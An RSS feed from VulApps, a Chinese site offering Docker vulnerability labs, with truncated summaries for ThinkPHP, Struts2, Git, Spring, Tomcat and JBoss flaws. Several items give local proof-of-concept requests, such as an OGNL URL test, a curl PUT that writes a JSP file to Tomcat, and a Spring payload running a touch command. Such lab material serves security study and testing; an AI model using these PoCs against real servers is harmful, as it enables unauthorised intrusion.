
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>VulApps</title>
    <description>VulApps 旨在快速搭建各种漏洞环境与安全工具环境，启动无需其它步骤，即开即用。</description>
    <link>http://vulapps.evalbug.com/</link>
    <atom:link href="http://vulapps.evalbug.com/feed.xml" rel="self" type="application/rss+xml"/>
    <pubDate>Tue, 11 Dec 2018 03:07:09 +0000</pubDate>
    <lastBuildDate>Tue, 11 Dec 2018 03:07:09 +0000</lastBuildDate>
    <generator>Jekyll v3.7.4</generator>
    
      <item>
        <title>ThinkPHP 5.0,5.1 远程代码执行漏洞</title>
        <description>&lt;style type=&quot;text/css&quot;&gt; .highlight pre{ white-space: pre-wrap; } &lt;/style&gt; &lt;h3 id=&quot;影响版本&quot;&gt;影响版本&lt;/h3&gt; &lt;p&gt;ThinkPHP &amp;lt; 5.0.23 ThinkPHP &amp;lt; 5.1.31&lt;/p&gt; &lt;h3 id=&quot;修复版本&quot;&gt;修复版本&lt;/h3&gt; &lt;p&gt;ThinkPHP 5.0.23&lt;/p&gt; &lt;p&gt;ThinkPHP 5.1.31&lt;/p&gt; &lt;p&gt;补丁发布日期为: 2018年12月9日&lt;/p&gt; &lt;h3 id=&quot;镜像信息-from-virinktpgetshell&quot;&gt;镜像信息 (FROM virink/tpgetshell)&lt;/h3&gt; &lt;table&gt; &lt;thead&gt; &lt;tr&gt; &lt;th style=&quot;text-align: center&quot;&gt;类型&lt;/th&gt; &lt;th style=&quot;text-align: center&quot;&gt;值&lt;/th&gt; &lt;/tr&gt; &lt;/thead&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;端口&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;80&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;ThinkPHP&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;5.1.30&lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt; &lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt; &lt;ol&gt; &lt;li&gt;拉取镜像到本地&lt;/li&gt; &lt;/ol&gt; &lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ docker pull medicean/vulapps:t_thinkphp_2 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt; &lt;ol&gt; &lt;li&gt;启动环境&lt;/li&gt; &lt;/ol&gt; &lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ docker run -d -p 80:80 medicean/vulapps:t_thinkphp_2 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt; &lt;blockquote&gt; &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 80:80&lt;/code&gt; 前面的 80 代表物理机的端口，可随意指定。&lt;/p&gt; &lt;/blockquote&gt; &lt;h3 id=&quot;使用与利用&quot;&gt;使用与利用&lt;/h3&gt; &lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://你的 IP 地址:端口号/&lt;/code&gt;,...</description>
        <pubDate>Sun, 09 Dec 2018 03:19:15 +0000</pubDate>
        <link>http://vulapps.evalbug.com/t_thinkphp_2/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/t_thinkphp_2/</guid>
        
        <category>ThinkPHP</category>
        
        <category>RCE</category>
        
        
        <category>ThinkPHP</category>
        
      </item>
    
      <item>
        <title>Struts2 远程代码执行漏洞(S2-057)</title>
        <description>&lt;style type=&quot;text/css&quot;&gt; .highlight pre{ white-space: pre-wrap; } &lt;/style&gt; &lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt; &lt;ul&gt; &lt;li&gt;&lt;a href=&quot;https://cwiki.apache.org/confluence/display/WW/S2-057&quot;&gt;S2-057 公告&lt;/a&gt;&lt;/li&gt; &lt;/ul&gt; &lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt; &lt;ol&gt; &lt;li&gt;拉取镜像到本地 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:s_struts2_s2-057 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;/li&gt; &lt;li&gt;启动环境 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 80:8080 medicean/vulapps:s_struts2_s2-057 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;blockquote&gt; &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 80:8080&lt;/code&gt; 前面的 80 代表物理机的端口，可随意指定。&lt;/p&gt; &lt;/blockquote&gt; &lt;/li&gt; &lt;/ol&gt; &lt;h3 id=&quot;使用与利用&quot;&gt;使用与利用&lt;/h3&gt; &lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://你的 IP 地址:端口号/&lt;/code&gt;&lt;/p&gt; &lt;h4 id=&quot;poc&quot;&gt;PoC&lt;/h4&gt; &lt;blockquote&gt; &lt;p&gt;例如目标地址为：http://127.0.0.1:8080/&lt;/p&gt; &lt;/blockquote&gt; &lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://127.0.0.1:8080/${(111+111)}/actionChain1.action&lt;/code&gt;&lt;/p&gt; &lt;p&gt;然后 URL 会变为 : &lt;code class=&quot;highlighter-rouge&quot;&gt;http://127.0.0.1:8080/222/register2.action&lt;/code&gt;, 其中 222 部分为 ognl 表达式 &lt;code class=&quot;highlighter-rouge&quot;&gt;${(111+111)}&lt;/code&gt; 执行结果。&lt;/p&gt; &lt;h4 id=&quot;exp&quot;&gt;Exp&lt;/h4&gt; &lt;p&gt;暂无&lt;/p&gt; &lt;h3 id=&quot;修复建议&quot;&gt;修复建议&lt;/h3&gt; &lt;p&gt;升级Apache struts 至 2.5.17 版本 或者 2.3.35 版本&lt;/p&gt;...</description>
        <pubDate>Wed, 22 Aug 2018 06:19:15 +0000</pubDate>
        <link>http://vulapps.evalbug.com/s_struts2_s2-057/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/s_struts2_s2-057/</guid>
        
        <category>Struts2</category>
        
        <category>RCE</category>
        
        
        <category>Struts2</category>
        
      </item>
    
      <item>
        <title>Git远程代码执行漏洞(CVE-2018-11235)</title>
        <description>&lt;h2 id=&quot;git远程代码执行漏洞cve-2018-11235&quot;&gt;Git远程代码执行漏洞(CVE-2018-11235)&lt;/h2&gt; &lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt; &lt;p&gt;近日，微软 Visual Studio 团队项目经理 Edward Thomson 在其博客中对外披露，Git 社区最近发现了一个严重漏洞，Git 子模块在解析时可能导致&lt;code class=&quot;highlighter-rouge&quot;&gt;git clone --recursive&lt;/code&gt;执行任意命令。&lt;/p&gt; &lt;p&gt;Git 和众多提供 Git 托管服务的公司都开始安装相关补丁程序，用以修补 Git 源码版本控制系统的一个危险漏洞。该补丁程序将包含在 Git 2.17.1 中，主要修补了两个安全漏洞 CVE-2018-11233 和 CVE-2018-11235。&lt;/p&gt; &lt;h3 id=&quot;影响范围&quot;&gt;影响范围&lt;/h3&gt; &lt;ul&gt; &lt;li&gt;Git &amp;lt; 2.17.1&lt;/li&gt; &lt;/ul&gt; &lt;h3 id=&quot;镜像信息&quot;&gt;镜像信息&lt;/h3&gt; &lt;h4 id=&quot;vul-镜像&quot;&gt;Vul 镜像&lt;/h4&gt; &lt;p&gt;该镜像模拟的是一个可在线 clone git 仓库的 web 界面，通过接收用户输入 URL, 将远程仓库 clone 到本地。在此例中充当受害者服务。&lt;/p&gt; &lt;table&gt; &lt;thead&gt; &lt;tr&gt; &lt;th style=&quot;text-align: center&quot;&gt;类型&lt;/th&gt; &lt;th style=&quot;text-align: center&quot;&gt;值&lt;/th&gt; &lt;/tr&gt; &lt;/thead&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;Git&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;1.9.1-1&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;HTTP 端口&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;80&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;镜像 tag&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;g_git_1&lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt; &lt;h4 id=&quot;exp-镜像&quot;&gt;Exp 镜像&lt;/h4&gt; &lt;p&gt;该镜像提供了 git web 服务，可生成带有攻击脚本的仓库，在此例中充当攻击者服务。&lt;/p&gt; &lt;table&gt; &lt;thead&gt; &lt;tr&gt;...</description>
        <pubDate>Fri, 01 Jun 2018 12:12:41 +0000</pubDate>
        <link>http://vulapps.evalbug.com/g_git_1/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/g_git_1/</guid>
        
        <category>Git</category>
        
        <category>RCE</category>
        
        
        <category>Git</category>
        
      </item>
    
      <item>
        <title>ThinkPHP Builder.php SQL注入漏洞</title>
        <description>&lt;h2 id=&quot;thinkphp-builderphp-sql注入漏洞&quot;&gt;ThinkPHP Builder.php SQL注入漏洞&lt;/h2&gt; &lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt; &lt;ul&gt; &lt;li&gt;&lt;a href=&quot;https://mp.weixin.qq.com/s/4xXS7usHMFNgDTEHcHBcBA&quot;&gt;敏信审计系列之THINKPHP3.2开发框架&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href=&quot;https://mp.weixin.qq.com/s/lNaH2-AAtk9JVKbbCBeIRA&quot;&gt;代码审计ThinkPHP 5.0.x 框架SQL注入&lt;/a&gt;&lt;/li&gt; &lt;/ul&gt; &lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt; &lt;ol&gt; &lt;li&gt;拉取镜像到本地 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:t_thinkphp_1 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;/li&gt; &lt;li&gt;启动环境 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 80:80 medicean/vulapps:t_thinkphp_1 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;blockquote&gt; &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 80:80&lt;/code&gt; 前面的 80 代表物理机的端口，可随意指定。&lt;/p&gt; &lt;/blockquote&gt; &lt;/li&gt; &lt;/ol&gt; &lt;h3 id=&quot;使用与利用&quot;&gt;使用与利用&lt;/h3&gt; &lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://你的 IP 地址:端口号/&lt;/code&gt;, 假设启动的端口号为 80&lt;/p&gt; &lt;h4 id=&quot;poc&quot;&gt;PoC&lt;/h4&gt; &lt;p&gt;1.访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://127.0.0.1/&lt;/code&gt;，测试服务是否启动成功。&lt;/p&gt; &lt;blockquote&gt; &lt;p&gt;该 Demo 是个消息盒子，灰色是已读消息，黑色为未读消息，当批量标记已读时，会触发漏洞&lt;/p&gt; &lt;/blockquote&gt; &lt;p&gt;&lt;img src=&quot;http://vulapps.poetn.cc/images/t_thinkphp_1_1.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt; &lt;p&gt;2.打开Burp，开启抓包，选择消息类别后，点击「标记已读」按钮，截获到数据包&lt;/p&gt; &lt;p&gt;该请求为 GET, 请求的 URL 为:&lt;/p&gt; &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;http://127.0.0.1/Home/Index/readcategorymsg?category&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;%E7%B3%BB%E7%BB%9F%E6%B6%88%E6%81%AF &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt; &lt;p&gt;&lt;img src=&quot;http://vulapps.poetn.cc/images/t_thinkphp_1_2.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt; &lt;p&gt;3.修改GET参数&lt;code class=&quot;highlighter-rouge&quot;&gt;category&lt;/code&gt;,提交到服务端后页面出现SQL注入报错结果:&lt;/p&gt; &lt;div...</description>
        <pubDate>Mon, 16 Apr 2018 12:12:41 +0000</pubDate>
        <link>http://vulapps.evalbug.com/t_thinkphp_1/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/t_thinkphp_1/</guid>
        
        <category>ThinkPHP</category>
        
        <category>SQLI</category>
        
        
        <category>ThinkPHP</category>
        
      </item>
    
      <item>
        <title>Spring Data Commons 代码执行漏洞(CVE-2018-1273)</title>
        <description>&lt;h2 id=&quot;spring-data-commons-代码执行漏洞cve-2018-1273&quot;&gt;Spring Data Commons 代码执行漏洞(CVE-2018-1273)&lt;/h2&gt; &lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt; &lt;ul&gt; &lt;li&gt;&lt;a href=&quot;https://xz.aliyun.com/t/2269&quot;&gt;Spring Data Commons Remote Code Execution 分析-【CVE-2018-1273】&lt;/a&gt;&lt;/li&gt; &lt;/ul&gt; &lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt; &lt;ol&gt; &lt;li&gt;拉取镜像到本地 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:s_spring_2 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;/li&gt; &lt;li&gt;启动环境 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 8080:8080 medicean/vulapps:s_spring_2 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;blockquote&gt; &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 8080:8080&lt;/code&gt; 前面的 8080 代表物理机的端口，可随意指定。&lt;/p&gt; &lt;/blockquote&gt; &lt;/li&gt; &lt;/ol&gt; &lt;h3 id=&quot;使用与利用&quot;&gt;使用与利用&lt;/h3&gt; &lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://你的 IP 地址:端口号/&lt;/code&gt;, 假设启动的端口号为 8080&lt;/p&gt; &lt;h4 id=&quot;poc&quot;&gt;PoC&lt;/h4&gt; &lt;ol&gt; &lt;li&gt; &lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://127.0.0.1:8080/users&lt;/code&gt;，测试服务是否启动成功&lt;/p&gt; &lt;/li&gt; &lt;li&gt; &lt;p&gt;发送如下数据包,执行命令为: &lt;code class=&quot;highlighter-rouge&quot;&gt;/bin/touch /tmp/vuln&lt;/code&gt;&lt;/p&gt; &lt;/li&gt; &lt;/ol&gt; &lt;div class=&quot;language-http highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nf&quot;&gt;POST&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;/users?page=&amp;amp;size=5&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;HTTP&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;m&quot;&gt;1.1&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;Host&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt; &lt;span...</description>
        <pubDate>Fri, 13 Apr 2018 05:12:41 +0000</pubDate>
        <link>http://vulapps.evalbug.com/s_spring_2/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/s_spring_2/</guid>
        
        <category>Spring</category>
        
        <category>RCE</category>
        
        
        <category>Spring</category>
        
      </item>
    
      <item>
        <title>Spring Data REST PATCH请求代码执行漏洞(CVE-2017-8046)</title>
        <description>&lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt; &lt;ul&gt; &lt;li&gt;&lt;a href=&quot;https://pivotal.io/security/cve-2017-8046&quot;&gt;CVE-2017-8046: RCE in PATCH requests in Spring Data REST&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href=&quot;https://mp.weixin.qq.com/s/uTiWDsPKEjTkN6z9QNLtSA&quot;&gt;这个Spring高危漏洞，你修补了吗？– 其河@美团点评技术团队&lt;/a&gt;&lt;/li&gt; &lt;/ul&gt; &lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt; &lt;ol&gt; &lt;li&gt;拉取镜像到本地 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:s_spring_1 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;/li&gt; &lt;li&gt;启动环境 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 8080:8080 medicean/vulapps:s_spring_1 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;blockquote&gt; &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 8080:8080&lt;/code&gt; 前面的 8080 代表物理机的端口，可随意指定。&lt;/p&gt; &lt;/blockquote&gt; &lt;/li&gt; &lt;/ol&gt; &lt;h3 id=&quot;使用与利用&quot;&gt;使用与利用&lt;/h3&gt; &lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://你的 IP 地址:端口号/&lt;/code&gt;, 假设启动的端口号为 8080&lt;/p&gt; &lt;h4 id=&quot;poc&quot;&gt;PoC&lt;/h4&gt; &lt;ol&gt; &lt;li&gt; &lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://127.0.0.1:8080/&lt;/code&gt;，测试服务是否启动成功 &lt;img src=&quot;https://github.com/Medicean/VulApps/raw/master/s/spring/1/poc-1.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt; &lt;/li&gt; &lt;li&gt;利用 POST 请求添加一个数据 &lt;div class=&quot;language-http highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;err&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;POST&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;/persons&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;HTTP&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;m&quot;&gt;1.1&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;...</description>
        <pubDate>Fri, 29 Sep 2017 05:12:41 +0000</pubDate>
        <link>http://vulapps.evalbug.com/s_spring_1/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/s_spring_1/</guid>
        
        <category>Spring</category>
        
        <category>RCE</category>
        
        
        <category>Spring</category>
        
      </item>
    
      <item>
        <title>Tomcat 远程代码执行漏洞 (CVE-2017-12615)</title>
        <description>&lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt; &lt;ul&gt; &lt;li&gt;&lt;a href=&quot;http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.81&quot;&gt;Fixed in Apache Tomcat 7.0.81&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href=&quot;https://mp.weixin.qq.com/s/dgWT3Cgf1mQs-IYxeID_Mw&quot;&gt;Tomcat代码执行漏洞分析测试(附POC)&lt;/a&gt;&lt;/li&gt; &lt;/ul&gt; &lt;blockquote&gt; &lt;p&gt;根据测试发现 7.0.81 并未修复完全，可绕过，具体参考下方paper链接&lt;/p&gt; &lt;/blockquote&gt; &lt;ul&gt; &lt;li&gt;&lt;a href=&quot;https://paper.seebug.org/398/&quot;&gt;云鼎实验室：Tomcat 远程代码执行漏洞分析（CVE-2017-12615）及补丁 Bypass&lt;/a&gt;&lt;/li&gt; &lt;/ul&gt; &lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt; &lt;ol&gt; &lt;li&gt;拉取镜像到本地 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:t_tomcat_1 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;/li&gt; &lt;li&gt;启动环境 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 8080:8080 medicean/vulapps:t_tomcat_1 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;blockquote&gt; &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 8080:8080&lt;/code&gt; 前面的 8080 代表物理机的端口，可随意指定。&lt;/p&gt; &lt;/blockquote&gt; &lt;/li&gt; &lt;/ol&gt; &lt;h3 id=&quot;使用与利用&quot;&gt;使用与利用&lt;/h3&gt; &lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://你的 IP 地址:端口号/&lt;/code&gt;&lt;/p&gt; &lt;h4 id=&quot;poc&quot;&gt;PoC&lt;/h4&gt; &lt;ol&gt; &lt;li&gt;向目标发起 PUT 请求，注意后缀为 &lt;code class=&quot;highlighter-rouge&quot;&gt;.jsp/&lt;/code&gt; &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;curl &lt;span class=&quot;nt&quot;&gt;-X&lt;/span&gt; PUT &lt;span class=&quot;s2&quot;&gt;&quot;http://127.0.0.1:8080/123.jsp/&quot;&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;'&amp;lt;%out.println(&quot;test&quot;);%&amp;gt;'&lt;/span&gt; &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;/li&gt;...</description>
        <pubDate>Wed, 20 Sep 2017 16:47:08 +0000</pubDate>
        <link>http://vulapps.evalbug.com/t_tomcat_1/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/t_tomcat_1/</guid>
        
        <category>Tomcat</category>
        
        <category>RCE</category>
        
        
        <category>Tomcat</category>
        
      </item>
    
      <item>
        <title>JBoss 「Java 反序列化」过程远程命令执行漏洞(CVE-2015-8103)</title>
        <description>&lt;h3 id=&quot;说明&quot;&gt;说明&lt;/h3&gt; &lt;p&gt;FoxGlove 安全研究团队于2015年11月06日在其博客上公开了一篇关于常见 Java 应用如何利用反序列化操作进行远程命令执行的文章。文中提到了2015年1月 AppSec2015 上一个关于各语言序列化操作利用议题《Marshalling Pickles》，其中介绍了 Ruby、Python、PHP 和 Java 中反序列化操作的危害，详细说明了 Java 中如何使用 Apache Commons Collections 这个常用库来构造 POP 链（类ROP链）来进行任意命令执行，并且提供了相应的 Payload 生成工具 – ysoserial。&lt;/p&gt; &lt;p&gt;原博文所提到的 WebSphere，WebLogic，JBoss，Jenkins 和 OpenNMS 等 Java 应用都使用了 &lt;code class=&quot;highlighter-rouge&quot;&gt;Apache Commons Collections&lt;/code&gt; 这个库，并且都存在一个序列化对象数据交互接口能够被访问到。针对每个应用，博文都提供了相应的分析和验证代码来说明 Java 应用存在远程命令执行的普遍性。&lt;/p&gt; &lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt; &lt;ul&gt; &lt;li&gt;&lt;a href=&quot;https://www.sebug.net/vuldb/ssvid-89723&quot;&gt;JBoss “Java 反序列化”过程远程命令执行漏洞&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href=&quot;https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/&quot;&gt;What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href=&quot;https://www.seebug.org/vuldb/ssvid-89713&quot;&gt;常见 Java Web 容器通用远程命令执行漏洞&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href=&quot;https://github.com/foxglovesec/JavaUnserializeExploits&quot;&gt;FoxGlovesec JavaUnserializeExploits&lt;/a&gt;&lt;/li&gt; &lt;li&gt;&lt;a href=&quot;http://www.freebuf.com/sectool/88908.html&quot;&gt;Java反序列化漏洞执行命令回显实现及Exploit下载&lt;/a&gt;&lt;/li&gt; &lt;/ul&gt; &lt;h3 id=&quot;镜像默认信息&quot;&gt;镜像默认信息&lt;/h3&gt; &lt;table&gt; &lt;thead&gt; &lt;tr&gt; &lt;th style=&quot;text-align: center&quot;&gt;类型&lt;/th&gt; &lt;th style=&quot;text-align: center&quot;&gt;值&lt;/th&gt; &lt;/tr&gt; &lt;/thead&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;JBoss 版本&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;6.1.0.Final&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;物理路径&lt;/td&gt;...</description>
        <pubDate>Tue, 12 Sep 2017 03:20:39 +0000</pubDate>
        <link>http://vulapps.evalbug.com/j_jboss_1/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/j_jboss_1/</guid>
        
        <category>JBoss</category>
        
        <category>RCE</category>
        
        
        <category>JBoss</category>
        
      </item>
    
      <item>
        <title>Struts2 远程代码执行漏洞(S2-053)</title>
        <description>&lt;style type=&quot;text/css&quot;&gt; .highlight pre{ white-space: pre-wrap; } &lt;/style&gt; &lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt; &lt;ul&gt; &lt;li&gt;&lt;a href=&quot;https://cwiki.apache.org/confluence/display/WW/S2-053&quot;&gt;S2-053 公告&lt;/a&gt;&lt;/li&gt; &lt;/ul&gt; &lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt; &lt;ol&gt; &lt;li&gt;拉取镜像到本地 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:s_struts2_s2-053 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;/li&gt; &lt;li&gt;启动环境 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span 